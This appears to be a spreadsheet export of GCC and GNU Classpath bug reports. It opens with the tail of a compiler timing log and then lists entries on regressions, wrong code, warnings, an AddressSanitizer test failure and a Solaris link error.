 rebuild jump labels     :   0.85 ( 0%) usr   0.00 ( 0%) sys   0.87 ( 0%) wall       7 kB ( 0%) ggc
 inline heuristics       :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall       0 kB ( 0%) ggc
 integration             :   0.10 ( 0%) usr   0.00 ( 0%) sys   0.10 ( 0%) wall   14586 kB ( 1%) ggc
 tree CFG cleanup        :   3.58 ( 0%) usr   0.01 ( 0%) sys   3.52 ( 0%) wall    2188 kB ( 0%) ggc
 tree VRP                :   1.49 ( 0%) usr   0.01 ( 0%) sys   1.56 ( 0%) wall   17581 kB ( 2%) ggc
 tree copy propagation   :   0.27 ( 0%) usr   0.01 ( 0%) sys   0.29 ( 0%) wall     858 kB ( 0%) ggc
 tree PTA                :   0.57 ( 0%) usr   0.00 ( 0%) sys   0.63 ( 0%) wall     670 kB ( 0%) ggc
 tree SSA rewrite        :   8.75 ( 0%) usr   0.01 ( 0%) sys   8.72 ( 0%) wall    1215 kB ( 0%) ggc
 tree SSA incremental    :  26.73 ( 1%) usr   0.00 ( 0%) sys  27.36 ( 1%) wall    3046 kB ( 0%) ggc
 tree operand scan       :   0.78 ( 0%) usr   0.26 ( 3%) sys   0.83 ( 0%) wall   39556 kB ( 4%) ggc
 dominator optimization  :   0.29 ( 0%) usr   0.00 ( 0%) sys   0.38 ( 0%) wall    7238 kB ( 1%) ggc
 tree CCP                :   0.34 ( 0%) usr   0.00 ( 0%) sys   0.42 ( 0%) wall    1098 kB ( 0%) ggc
 tree PHI const/copy prop:   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall     126 kB ( 0%) ggc
 tree split crit edges   :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall    1301 kB ( 0%) ggc
 tree reassociation      :   0.19 ( 0%) usr   0.01 ( 0%) sys   0.26 ( 0%) wall    5052 kB ( 0%) ggc
 tree PRE                :   1.17 ( 0%) usr   0.01 ( 0%) sys   1.14 ( 0%) wall   13070 kB ( 1%) ggc
 tree FRE                :   0.54 ( 0%) usr   0.01 ( 0%) sys   0.57 ( 0%) wall    6904 kB ( 1%) ggc
 tree code sinking       :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.03 ( 0%) wall     427 kB ( 0%) ggc
 tree linearize phis     :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall      30 kB ( 0%) ggc
 tree forward propagate  :   0.05 ( 0%) usr   0.00 ( 0%) sys   0.10 ( 0%) wall    1803 kB ( 0%) ggc
 tree phiprop            :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall       0 kB ( 0%) ggc
 tree conservative DCE   :   0.14 ( 0%) usr   0.01 ( 0%) sys   0.15 ( 0%) wall     155 kB ( 0%) ggc
 tree aggressive DCE     :   0.36 ( 0%) usr   0.00 ( 0%) sys   0.43 ( 0%) wall   11259 kB ( 1%) ggc
 tree DSE                :   0.19 ( 0%) usr   0.00 ( 0%) sys   0.18 ( 0%) wall       0 kB ( 0%) ggc
 tree loop bounds        :   0.31 ( 0%) usr   0.00 ( 0%) sys   0.25 ( 0%) wall   11761 kB ( 1%) ggc
 tree loop invariant motion:   0.22 ( 0%) usr   0.02 ( 0%) sys   0.23 ( 0%) wall    4266 kB ( 0%) ggc
 tree canonical iv       :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall     875 kB ( 0%) ggc
 scev constant prop      :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.04 ( 0%) wall    2182 kB ( 0%) ggc
 complete unrolling      :   0.70 ( 0%) usr   0.00 ( 0%) sys   0.77 ( 0%) wall   37727 kB ( 4%) ggc
 tree vectorization      :   0.79 ( 0%) usr   0.04 ( 0%) sys   0.84 ( 0%) wall   36624 kB ( 3%) ggc
 tree slp vectorization  :   0.45 ( 0%) usr   0.00 ( 0%) sys   0.44 ( 0%) wall   11293 kB ( 1%) ggc
 tree loop distribution  :   3.31 ( 0%) usr   0.00 ( 0%) sys   3.32 ( 0%) wall     857 kB ( 0%) ggc
 tree prefetching        :  51.24 ( 1%) usr   0.07 ( 1%) sys  52.02 ( 1%) wall   56594 kB ( 5%) ggc
 tree iv optimization    :   7.47 ( 0%) usr   0.09 ( 1%) sys   7.64 ( 0%) wall  200051 kB (19%) ggc
 predictive commoning    :   0.25 ( 0%) usr   0.00 ( 0%) sys   0.20 ( 0%) wall    6379 kB ( 1%) ggc
 tree loop init          :   0.10 ( 0%) usr   0.00 ( 0%) sys   0.08 ( 0%) wall     856 kB ( 0%) ggc
 tree copy headers       :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall    1560 kB ( 0%) ggc
 tree SSA uncprop        :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.03 ( 0%) wall       0 kB ( 0%) ggc
 tree rename SSA copies  :   0.07 ( 0%) usr   0.00 ( 0%) sys   0.05 ( 0%) wall       0 kB ( 0%) ggc
 tree SSA verifier       : 376.24 ( 7%) usr   0.04 ( 0%) sys 379.72 ( 7%) wall       0 kB ( 0%) ggc
 tree STMT verifier      : 439.42 ( 9%) usr   0.16 ( 2%) sys 443.29 ( 9%) wall       0 kB ( 0%) ggc
 callgraph verifier      :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall      63 kB ( 0%) ggc
 dominance frontiers     :  16.93 ( 0%) usr   0.03 ( 0%) sys  16.81 ( 0%) wall       0 kB ( 0%) ggc
 dominance computation   :  10.78 ( 0%) usr   0.00 ( 0%) sys  10.50 ( 0%) wall       0 kB ( 0%) ggc
 control dependences     :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
 out of ssa              :   0.63 ( 0%) usr   0.00 ( 0%) sys   0.68 ( 0%) wall     207 kB ( 0%) ggc
 expand vars             :   0.08 ( 0%) usr   0.00 ( 0%) sys   0.08 ( 0%) wall   12686 kB ( 1%) ggc
 expand                  :   0.83 ( 0%) usr   0.00 ( 0%) sys   0.76 ( 0%) wall   50753 kB ( 5%) ggc
 post expand cleanups    :   0.05 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall    3897 kB ( 0%) ggc
 lower subreg            :   0.28 ( 0%) usr   0.00 ( 0%) sys   0.29 ( 0%) wall       0 kB ( 0%) ggc
 forward prop            :   1.07 ( 0%) usr   0.00 ( 0%) sys   1.10 ( 0%) wall   11010 kB ( 1%) ggc
 CSE                     :   0.71 ( 0%) usr   0.00 ( 0%) sys   0.77 ( 0%) wall     446 kB ( 0%) ggc
 dead code elimination   :   1.73 ( 0%) usr   0.00 ( 0%) sys   1.74 ( 0%) wall       0 kB ( 0%) ggc
 dead store elim1        :   1.33 ( 0%) usr   0.00 ( 0%) sys   1.35 ( 0%) wall   15295 kB ( 1%) ggc
 dead store elim2        :   1.50 ( 0%) usr   0.00 ( 0%) sys   1.54 ( 0%) wall   15743 kB ( 1%) ggc
 loop analysis           :   0.11 ( 0%) usr   0.00 ( 0%) sys   0.11 ( 0%) wall    1864 kB ( 0%) ggc
 loop invariant motion   :  24.13 ( 0%) usr   0.02 ( 0%) sys  23.97 ( 0%) wall    1275 kB ( 0%) ggc
 loop unswitching        : 872.57 (17%) usr   0.01 ( 0%) sys 873.51 (17%) wall     111 kB ( 0%) ggc
 loop unrolling          :2802.10 (55%) usr   4.15 (44%) sys2910.38 (56%) wall   99541 kB ( 9%) ggc
 CPROP                   :   0.40 ( 0%) usr   0.00 ( 0%) sys   0.26 ( 0%) wall    3209 kB ( 0%) ggc
 PRE                     :   0.22 ( 0%) usr   0.00 ( 0%) sys   0.20 ( 0%) wall     113 kB ( 0%) ggc
 code hoisting           :   0.09 ( 0%) usr   0.00 ( 0%) sys   0.08 ( 0%) wall       4 kB ( 0%) ggc
 web                     :   1.60 ( 0%) usr   0.02 ( 0%) sys   1.63 ( 0%) wall    6999 kB ( 1%) ggc
 CSE 2                   :   1.49 ( 0%) usr   0.00 ( 0%) sys   1.53 ( 0%) wall    1326 kB ( 0%) ggc
 combiner                :  23.55 ( 0%) usr   0.04 ( 0%) sys  23.84 ( 0%) wall   53172 kB ( 5%) ggc
 if-conversion           :  13.53 ( 0%) usr   0.01 ( 0%) sys  13.69 ( 0%) wall    1910 kB ( 0%) ggc
 regmove                 :   0.92 ( 0%) usr   0.00 ( 0%) sys   0.94 ( 0%) wall       9 kB ( 0%) ggc
 integrated RA           :  19.24 ( 0%) usr   3.00 (32%) sys  22.40 ( 0%) wall  151112 kB (14%) ggc
 reload                  :  16.17 ( 0%) usr   0.00 ( 0%) sys  16.37 ( 0%) wall   12120 kB ( 1%) ggc
 reload CSE regs         :   3.43 ( 0%) usr   0.00 ( 0%) sys   3.52 ( 0%) wall   25345 kB ( 2%) ggc
 load CSE after reload   :   1.71 ( 0%) usr   0.00 ( 0%) sys   1.74 ( 0%) wall     919 kB ( 0%) ggc
 zee                     :   0.47 ( 0%) usr   0.00 ( 0%) sys   0.48 ( 0%) wall      42 kB ( 0%) ggc
 thread pro- &amp; epilogue  :   0.10 ( 0%) usr   0.00 ( 0%) sys   0.11 ( 0%) wall     618 kB ( 0%) ggc
 if-conversion 2         :   0.20 ( 0%) usr   0.01 ( 0%) sys   0.21 ( 0%) wall     776 kB ( 0%) ggc
 combine stack adjustments:   0.10 ( 0%) usr   0.00 ( 0%) sys   0.11 ( 0%) wall       0 kB ( 0%) ggc
 peephole 2              :   0.32 ( 0%) usr   0.00 ( 0%) sys   0.33 ( 0%) wall    2368 kB ( 0%) ggc
 rename registers        :   1.13 ( 0%) usr   0.00 ( 0%) sys   1.16 ( 0%) wall    3536 kB ( 0%) ggc
 hard reg cprop          :   0.82 ( 0%) usr   0.00 ( 0%) sys   0.78 ( 0%) wall      15 kB ( 0%) ggc
 scheduling 2            :   4.34 ( 0%) usr   0.00 ( 0%) sys   4.35 ( 0%) wall     351 kB ( 0%) ggc
 machine dep reorg       :   0.76 ( 0%) usr   0.00 ( 0%) sys   0.73 ( 0%) wall      15 kB ( 0%) ggc
 reorder blocks          :   0.93 ( 0%) usr   0.00 ( 0%) sys   0.92 ( 0%) wall    2694 kB ( 0%) ggc
 final                   :   1.68 ( 0%) usr   0.09 ( 1%) sys   1.76 ( 0%) wall     423 kB ( 0%) ggc
 rest of compilation     :   1.73 ( 0%) usr   0.02 ( 0%) sys   1.73 ( 0%) wall    5241 kB ( 0%) ggc
 remove unused locals    :   0.96 ( 0%) usr   0.00 ( 0%) sys   0.87 ( 0%) wall       0 kB ( 0%) ggc
 address taken           :   0.05 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall       0 kB ( 0%) ggc
 unaccounted todo        :   1.15 ( 0%) usr   0.02 ( 0%) sys   1.16 ( 0%) wall       9 kB ( 0%) ggc
 verify loop closed      : 168.68 ( 3%) usr   0.05 ( 1%) sys 169.90 ( 3%) wall       0 kB ( 0%) ggc
 verify RTL sharing      :   8.07 ( 0%) usr   0.00 ( 0%) sys   8.30 ( 0%) wall       0 kB ( 0%) ggc
 rebuild frequencies     :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall     249 kB ( 0%) ggc
 repair loop structures  :   0.48 ( 0%) usr   0.00 ( 0%) sys   0.48 ( 0%) wall     961 kB ( 0%) ggc
 TOTAL                 :5086.93             9.45          5213.38            1073764 kB
Extra diagnostic checks enabled compiler may run slowly.
Configure with --enable-checking=release to disable checks.
COLLECT_GCC_OPTIONS='-c' '-v' '-save-temps' '-ftime-report' '-u' 'se-linker-plugin' '-O3' '-march=native' '-funroll-loops' '-ffast-math' '-ffree-form' '-D' '__GFORTRAN' '-D' '__FFTSG' '-D' '__FFTW3' '-D' '__LIBINT' '-I' '/ext/software/64/gfortran-suite/include' '-D' '__COMPILE_ARCH=gfortran-test13' '-D' '__COMPILE_DATE=Sun Jul 10 14:22:33 CEST 2011' '-D' '__COMPILE_HOST=pcihopt3' '-D' '__COMPILE_LASTCVS=/qs_scf.F/1.527/Sat Jul  9 07:18:08 2011//' '-L/users/vondele/LAPACK/' '-L/ext/software/64/gfortran-suite/lib' '-shared-libgcc' '-dumpdir' '/data03/vondele/cp2k_gcc/cp2k/makefiles/../exe/gfortran-test13/' '-dumpbase' 'cp2k.sopt.ltrans29' '-fltrans' '-o' 'cp2k.sopt.ltrans29.ltrans.o'
 as --64 -o cp2k.sopt.ltrans29.ltrans.o cp2k.sopt.ltrans29.s
COMPILER_PATH=/data03/vondele/gnu/gcc_trunk/install/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/:/data03/vondele/gnu/gcc_trunk/install/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/:/data03/vondele/gnu/gcc_trunk/install/libexec/gcc/x86_64-unknown-linux-gnu/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/:/data03/vondele/gnu/gcc_trunk/install/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/:/data03/vondele/gnu/gcc_trunk/install/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/:/data03/vondele/gnu/gcc_trunk/install/libexec/gcc/x86_64-unknown-linux-gnu/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/
LIBRARY_PATH=/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../lib64/../lib64/:/lib/../lib64/../lib64/:/usr/lib/../lib64/../lib64/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../:/lib/:/usr/lib/:/data03/vondele/gnu/gcc_trunk/install/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-c' '-v' '-save-temps' '-ftime-report' '-u' 'se-linker-plugin' '-O3' '-march=native' '-funroll-loops' '-ffast-math' '-ffree-form' '-D' '__GFORTRAN' '-D' '__FFTSG' '-D' '__FFTW3' '-D' '__LIBINT' '-I' '/ext/software/64/gfortran-suite/include' '-D' '__COMPILE_ARCH=gfortran-test13' '-D' '__COMPILE_DATE=Sun Jul 10 14:22:33 CEST 2011' '-D' '__COMPILE_HOST=pcihopt3' '-D' '__COMPILE_LASTCVS=/qs_scf.F/1.527/Sat Jul  9 07:18:08 2011//' '-L/users/vondele/LAPACK/' '-L/ext/software/64/gfortran-suite/lib' '-shared-libgcc' '-dumpdir' '/data03/vondele/cp2k_gcc/cp2k/makefiles/../exe/gfortran-test13/' '-dumpbase' 'cp2k.sopt.ltrans29' '-fltrans' '-o' 'cp2k.sopt.ltrans29.ltrans.o'
[Leaving LTRANS /dev/shm/vondele/ccGyXn6S.args]</t>
  </si>
  <si>
    <t>GCC-53595</t>
  </si>
  <si>
    <t>Code size increase of +10% between two 4.7.1 snapshot</t>
  </si>
  <si>
    <t>Created attachment 27568
C source
This problem report is about a +10% of code size increase between the following two 4.7.1 versions of gcc:
V1: SVN 185693 gcc-4_7-branch from 2012-03-22 4.7.1 (prerelease)
V2: SVN 188257 gcc-4_7-branch from 2012-06-06 4.7.1 (prerelease)
The attached test case is a reduced test case out of many other sources that suffer from the same problem so that the overall performance degradation is unpleasant.
The RTL dumps show that the first pass that differs is IRA.
== Command line ==
$ avr-gcc -mmcu=atmega168 -c -std=gnu99 -Os -mstrict-X -ffixed-2 -ffixed-3 -dp -fdump-rtl-ira-details -fdump-rtl-reload-details -fdump-rtl-postreload-details bresenham-i.c -o bresenham-i-1.o -save-temps=obj
resp. with  -o bresenham-i-2.o for the second 4.7.1 snapshot.
== GCC configure ==
Target: avr
Configured with: ../../gcc.gnu.org/gcc-4_7-branch/configure --target=avr --prefix=/local/gnu/install/gcc-4.7-mingw32 --host=i386-mingw32 --build=i686-linux-gnu --enable-languages=cc++ --disable-nls --disable-shared --with-dwarf2
Thread model: single
gcc version 4.7.1 20120606 (prerelease) (GCC) 
GNU C (GCC) version 4.7.1 20120606 (prerelease) (avr)
	compiled by GNU C version 3.4.5 (mingw-vista special r2) GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.2
It's a canadian cross but that surely does not matter here...</t>
  </si>
  <si>
    <t>GCC-20004</t>
  </si>
  <si>
    <t>[3.3 Regression] G++ disregards __attribute__((regparm(3))) when calling through a const pointer</t>
  </si>
  <si>
    <t>Output from g++ -v:
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--disable-checking --with-system-zlib --enable-__cxa_atexit --host=i386-redhat-linux
Thread model: posix
gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-20)
Compile the following code using g++ -S bug.c:
---8&lt;---bug.c------------------------------------------8&lt;---
struct Foo
{
  int __attribute__((regparm(3)))
    (*p)(int)
}
extern struct Foo *foo
extern const struct Foo *bar
int
baz(int i)
{
  return (foo-&gt;p)(i)
}
int
zip(int i)
{
  return (bar-&gt;p)(i)
}
---8&lt;--------------------------------------------------8&lt;---
The only difference between baz() and zip() is that baz() uses a struct Foo *
while zip() uses a const struct Foo *.  However in the generated assembler
code baz() passes parameters in registers as requested and zip() doesn't.
_Z3bazi:
        [...]
        movl    foo %eax
        movl    (%eax) %edx
        movl    8(%ebp) %eax
        call    *%edx
_Z3zipi:
        [...]
        movl    bar %eax
        pushl   8(%ebp)
        movl    (%eax) %eax
        call    *%eax
Note: This bug is specific to the C++ compiler the C compiler does the right
thing.</t>
  </si>
  <si>
    <t>GCC-48780</t>
  </si>
  <si>
    <t>[C++0x] scoped enumerations and va_arg (default argument promotions)</t>
  </si>
  <si>
    <t>In the 2011 FDIS default argument promotions are defined to leave arguments of
scoped enumeration types as-is (without conversion).
This appears to be an interaction with old wording and I am not aware of any
rationale behind this.
For cases where the underlying type has rank lower than that of int GCC
performs the default argument promotions as-if the enumeration is unscoped.
This manifests itself as a warning message and a run-time abend.
In 5.2.2 [expr.call]
If the argument has integral or enumeration type that is subject to the
integral promotions (4.5) ... the value of the argument is converted to the
promoted type before the call. These promotions are referred to as the default
argument promotions.
In 4.5 [conv.prom] integral promotions are not specified to apply to scoped
enumerations.
### Self-contained source (a.cpp):
typedef __builtin_va_list __gnuc_va_list
typedef __gnuc_va_list va_list
enum struct A : short { X }
void foo(int x ...) {
   va_list vl
   __builtin_va_start(vl x)
   enum A t = __builtin_va_arg(vl enum A)
   __builtin_va_end(vl)
}
int main() {
   foo(0 A::X)
}
### Compiler Invocation:
g++ -std=c++0x -Wall -W -pedantic -c a.cpp
### Compiler Output (return code 0):
/data/a.cpp: In function 'void foo(int ...)':
/data/a.cpp:9:11: warning: unused variable 't' [-Wunused-variable]
/data/a.cpp:9:42: warning: 'A' is promoted to 'int' when passed through '...' [enabled by default]
/data/a.cpp:9:42: note: (so you should pass 'int' not 'A' to 'va_arg')
/data/a.cpp:9:42: note: if this code is reached the program will abort
### Run output:
Program received signal SIGTRAP Trace/breakpoint trap.
### g++ -v output:
Using built-in specs.
Target: powerpc64-unknown-linux-gnu
Configured with: ./configure --prefix=/data/gcc --program-suffix=-4.6.0 --disable-libssp --disable-libgcj --enable-version-specific-runtime-libs --with-cpu=default32 --enable-secureplt --with-long-double-128 --enable-shared --enable-__cxa_atexit --enable-threads=posix --enable-languages=cc++fortran --with-gmp=/usr/local
Thread model: posix
gcc version 4.6.0 (GCC)</t>
  </si>
  <si>
    <t>hstong</t>
  </si>
  <si>
    <t>GCC-26138</t>
  </si>
  <si>
    <t>Lots of warnings with gcj .jar -&gt; .so</t>
  </si>
  <si>
    <t>When natively-compiling the Eclipse jars I get lots of warnings similar to this:
org/eclipse/swt/internal/SWTEventObject.java:0: warning: '_otable_syms_org_eclipse_swt_internal_SWTEventObject' defined but not used
org/eclipse/swt/internal/SWTEventObject.java:0: warning: '_itable_syms_org_eclipse_swt_internal_SWTEventObject' defined but not used
I am compiling this jar like this:
/usr/bin/gcj -c -O2 -g -pipe -Wall -Wp-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m32 -march=i386 -mtune=pentium4 -fasynchronous-unwind-tables -fPIC -findirect-dispatch -fjni /var/tmp/eclipse-3.1.2-1jpp_4fc-buildroot/usr/lib/gcj/eclipse/org.eclipse.swt.gtk.linux.x86_3.1.1.jar.1.jar -o /var/tmp/eclipse-3.1.2-1jpp_4fc-buildroot/usr/lib/gcj/eclipse/org.eclipse.swt.gtk.linux.x86_3.1.1.jar.1.jar.o
$ gcj --version
gcj (GCC) 4.1.0 20060131 (Red Hat 4.1.0-0.20)
i386</t>
  </si>
  <si>
    <t>GCC-19673</t>
  </si>
  <si>
    <t>pointer function with RESULT specified returns pointer to ptr rather than *ptr</t>
  </si>
  <si>
    <t>This is a bug that is specific to functions where RESULT is specified in the
function statement(function foo).  In this case the pointer itself is
printed.
Where RESULT is not specified functions return a pointer result
correctly(function bar).  Here the value pointed too is printed.
$ cat   return_pointer.f90
! Test the return of  pointer
program ret_ptr
  print * foo (99)   from function foo (arg) result (ptr)
  print * bar (99)   from function bar (arg)
contains
  function foo (arg) result(ptr)
    integer :: arg
    integer pointer :: ptr
    allocate (ptr)
    ptr = arg
  end function foo
  function bar (arg)
    integer :: arg
    integer pointer :: bar
    allocate (bar)
    bar = arg
  end function bar
end  program ret_ptr
$ ./a
   168034328  from function foo (arg) result (ptr)
          99  from function bar (arg)</t>
  </si>
  <si>
    <t>paulthomas2</t>
  </si>
  <si>
    <t>GCC-33929</t>
  </si>
  <si>
    <t>Warning in uintp.adb</t>
  </si>
  <si>
    <t>../../xgcc -B../../ -c -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -fno-common      -gnatpg -gnata -I- -I../rts -I.
-I/home/sam/Dev/gcc/gcc/ada /home/sam/Dev/gcc/gcc/ada/uintp.adb -o uintp.o
/home/sam/Dev/gcc/gcc/ada/uintp.adb: In function â€˜Uintp.Ui_Div_Remâ€™:
/home/sam/Dev/gcc/gcc/ada/uintp.adb:171: warning: â€˜Quotientâ€™ may be used
uninitialized in this function
/home/sam/Dev/gcc/gcc/ada/uintp.adb:171: note: â€˜Quotientâ€™ was declared here
/home/sam/Dev/gcc/gcc/ada/uintp.adb:172: warning: â€˜Remainderâ€™ may be used
uninitialized in this function
/home/sam/Dev/gcc/gcc/ada/uintp.adb:172: note: â€˜Remainderâ€™ was declared here
% gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ./configure --prefix=/home/sam/local/i386-linux --enable-languages='c ada' --disable-bootstrap
Thread model: posix
gcc version 4.3.0 20071027 (experimental) (GCC)
Patch will be submitted.</t>
  </si>
  <si>
    <t>GCC-55504</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/20071018-1.c execution failures with -fsanitize=address</t>
  </si>
  <si>
    <t>Using...
make -k check-gcc RUNTESTFLAGS=--target_board=unix'{-fsanitize=address}'
on x86_64-apple-darwin12 produces execution failures in...
FAIL: gcc.c-torture/execute/20071018-1.c execution  -O0 
FAIL: gcc.c-torture/execute/20071018-1.c execution  -O1 
FAIL: gcc.c-torture/execute/20071018-1.c execution  -O2 
FAIL: gcc.c-torture/execute/20071018-1.c execution  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/20071018-1.c execution  -O3 -g 
FAIL: gcc.c-torture/execute/20071018-1.c execution  -Os 
FAIL: gcc.c-torture/execute/20071018-1.c execution  -Og -g 
FAIL: gcc.c-torture/execute/20071018-1.c execution  -O2 -flto -flto-partition=none 
FAIL: gcc.c-torture/execute/20071018-1.c execution  -O2 -flto 
which are of the form...
Executing on host: /sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/ /sw/src/fink.build/gcc48-4.8.0-1000/gcc-4.8-20121127/gcc/testsuite/gcc.c-torture/execute/20071018-1.c  -fno-diagnostics-show-caret  -w  -O0   -lm   -fsanitize=address -o /sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/gcc/20071018-1.x0    (timeout = 300)
PASS: gcc.c-torture/execute/20071018-1.c compilation  -O0
Setting LD_LIBRARY_PATH to :/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc::/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc
=================================================================
==32238== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x00010e4d9fb8 at pc 0x10b81ee35 bp 0x7fff543dea70 sp 0x7fff543dea68
WRITE of size 8 at 0x00010e4d9fb8 thread T0
    #0 0x10b81ee34 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/gcc/20071018-1.x0+0x100000e34)
    #1 0x10b81ee89 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/gcc/20071018-1.x0+0x100000e89)
    #2 0x7fff8bd827e0 (/usr/lib/system/libdyld.dylib+0x27e0)
    #3 0x0
0x00010e4d9fb8 is located 8 bytes to the left of 32-byte region [0x00010e4d9fc00x00010e4d9fe0)
allocated by thread T0 here:
    #0 0x10b830a25 (/sw/lib/gcc4.8/lib/libasan.0.dylib+0xba25)
    #1 0x7fff94c3b152 (/usr/lib/system/libsystem_c.dylib+0x2d152)
    #2 0x7fff94c3bba6 (/usr/lib/system/libsystem_c.dylib+0x2dba6)
    #3 0x10b81ede3 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/gcc/20071018-1.x0+0x100000de3)
    #4 0x10b81ee89 (/sw/src/fink.build/gcc48-4.8.0-1000/darwin_objdir/gcc/testsuite/gcc/20071018-1.x0+0x100000e89)
    #5 0x7fff8bd827e0 (/usr/lib/system/libdyld.dylib+0x27e0)
Shadow byte and word:
  0x100021c9b3f7: fa
  0x100021c9b3f0: fa fa fa fa fa fa fa fa
More shadow bytes:
  0x100021c9b3d0: fa fa fa fa fa fa fa fa
  0x100021c9b3d8: fa fa fa fa fa fa fa fa
  0x100021c9b3e0: fa fa fa fa fa fa fa fa
  0x100021c9b3e8: fa fa fa fa fa fa fa fa
=&gt;0x100021c9b3f0: fa fa fa fa fa fa fa fa
  0x100021c9b3f8: 00 00 00 00 fb fb fb fb
  0x100021c9b400: fa fa fa fa fa fa fa fa
  0x100021c9b408: fa fa fa fa fa fa fa fa
  0x100021c9b410: fa fa fa fa fa fa fa fa
Stats: 0M malloced (0M for red zones) by 1 calls
Stats: 0M realloced by 0 calls
Stats: 0M freed by 0 calls
Stats: 0M really freed by 0 calls
Stats: 0M (128 full pages) mmaped in 1 calls
  mmaps   by size class: 7:4095
  mallocs by size class: 7:1
  frees   by size class:
  rfrees  by size class:
Stats: malloc large: 0 small slow: 1
==32238== ABORTING
FAIL: gcc.c-torture/execute/20071018-1.c execution  -O0</t>
  </si>
  <si>
    <t>CLASSPATH-22678</t>
  </si>
  <si>
    <t>java.awt.color.ColorSpace.isCS_sRGB() always returns false</t>
  </si>
  <si>
    <t xml:space="preserve">The following code prints false with classpath (gij sablevm kaffe which also uses classpath for this class) while it should most likely return true (and does indeed with Sun VMs).
import java.awt.color.*
public class CS_sRGB
{
  public static void main(String[] args)
  {
System.out.println(ColorSpace.getInstance(ColorSpace.CS_sRGB).isCS_sRGB())
  }
}
I contacted Mauve to see if they would accept a testcase although they have no AWT at the moment.
</t>
  </si>
  <si>
    <t>GCC-49914</t>
  </si>
  <si>
    <t>call to abs(long long) in gcc/fold-const.c</t>
  </si>
  <si>
    <t>Hello
in gcc/fold-const.c (currently line 7051) in function fold_plusminus_mult_expr:
if (exact_log2 (abs (int11)) &gt; 0 &amp;&amp; int01 % int11 == 0
where int11 is a HOST_WIDE_INT. Is this call to abs safe? A few lines above abs is computed as x&gt;=0?x:-x.
(don't know how to classify this but it causes a build failure for me with a C++98 compiler (ambiguous))</t>
  </si>
  <si>
    <t>marc.glisse</t>
  </si>
  <si>
    <t>GCC-32462</t>
  </si>
  <si>
    <t>[4.3 regression] Linking libgcj.so fails on Solaris 10/x86</t>
  </si>
  <si>
    <t xml:space="preserve">
A mainline bootstrap as of 20070618 on Solaris 10/x86 with the bundled gas
2.15 fails to link libgcj.so:
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::queueLock: relocation must bind locally
collect2: ld returned 1 exit status
make[3]: *** [libgcj.la] Error 1
Performing the same link on Solaris 11 gives
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::queueLock: a GOT relative relocation must reference a local symbol
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::queueLock: a GOT relative relocation must reference a local symbol
